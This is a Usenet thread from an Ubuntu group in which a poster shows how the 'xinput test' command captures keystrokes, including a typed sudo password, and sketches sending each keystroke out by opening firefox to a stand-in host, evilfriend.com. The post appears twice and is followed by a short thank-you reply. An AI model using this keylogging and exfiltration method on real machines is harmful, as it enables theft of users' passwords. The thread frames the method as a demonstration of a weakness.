1. Forum
  2. Usenet
  3. ALT.OS.LINUX.UBUNTU

  • Re: 1 line keylogger that logs your sudo terminal password

    From user@21:1/5 to user on Wed Dec 1 02:29:43 2021
    Sorry I didn´t know that the https://evilfriend.com website really exists.

    On 01.12.21 02:25, user wrote:
    To my surprise it is very simple to log your sudo password. Here are instructions to test it yourself. It is very simple to echo it to a log
    file in a hidden background process from a shell script too if you want.

    Open a terminal and type this:
    ~$ xinput --list
    AT Translated Set 2 keyboard id=15 [slave keyboard (3)]

    You will see devices listed, from which one is your keyboard.

    Then do this from the id=15 you found:
    $ xinput test 16

    Now in another terminal window type in:
    $ sudo apt update
    [sudo] password for user:

    You will see that everything which you type including your passwords
    shows up.

    Now imagine that! Such a script can easily do the following.

    Instead of logging we will use in this example firefox installed on a
    system and send every echo to a website by opening firefox after every keystroke

    example:
    $ firefox https://evilfriend.com/chuckythegoodguy/M
    $ firefox https://evilfriend.com/chuckythegoodguy/y
    $ firefox https://evilfriend.com/chuckythegoodguy/P
    $ firefox https://evilfriend.com/chuckythegoodguy/a
    $ firefox https://evilfriend.com/chuckythegoodguy/S

    I call this Your Evilfriend Attack!

    You will need:
    $ xmodmap -pke

    Have a nice day!


    --- SoupGate-Win32 v1.05
    * Origin: fsxNet Usenet Gateway (21:1/5)
  • From user@21:1/5 to All on Wed Dec 1 02:25:21 2021
    To my surprise it is very simple to log your sudo password. Here are instructions to test it yourself. It is very simple to echo it to a log
    file in a hidden background process from a shell script too if you want.

    Open a terminal and type this:
    ~$ xinput --list
    AT Translated Set 2 keyboard id=15 [slave keyboard (3)]

    You will see devices listed, from which one is your keyboard.

    Then do this from the id=15 you found:
    $ xinput test 16

    Now in another terminal window type in:
    $ sudo apt update
    [sudo] password for user:

    You will see that everything which you type including your passwords
    shows up.

    Now imagine that! Such a script can easily do the following.

    Instead of logging we will use in this example firefox installed on a
    system and send every echo to a website by opening firefox after every keystroke

    example:
    $ firefox https://evilfriend.com/chuckythegoodguy/M
    $ firefox https://evilfriend.com/chuckythegoodguy/y
    $ firefox https://evilfriend.com/chuckythegoodguy/P
    $ firefox https://evilfriend.com/chuckythegoodguy/a
    $ firefox https://evilfriend.com/chuckythegoodguy/S

    I call this Your Evilfriend Attack!

    You will need:
    $ xmodmap -pke

    Have a nice day!

    --- SoupGate-Win32 v1.05
    * Origin: fsxNet Usenet Gateway (21:1/5)
  • From Ralf Schneider@21:1/5 to All on Wed Dec 15 18:44:21 2021
    Am Wed, 1 Dec 2021 02:29:43 +0100 schrieb user:

    Sorry I didn´t know that the https://evilfriend.com website really
    exists.

    On 01.12.21 02:25, user wrote:

    Have a nice day!

    Yes we have. It neerly kicked me from my chair. Thanks for information !

    Regards
    Ralf

    --- SoupGate-Win32 v1.05
    * Origin: fsxNet Usenet Gateway (21:1/5)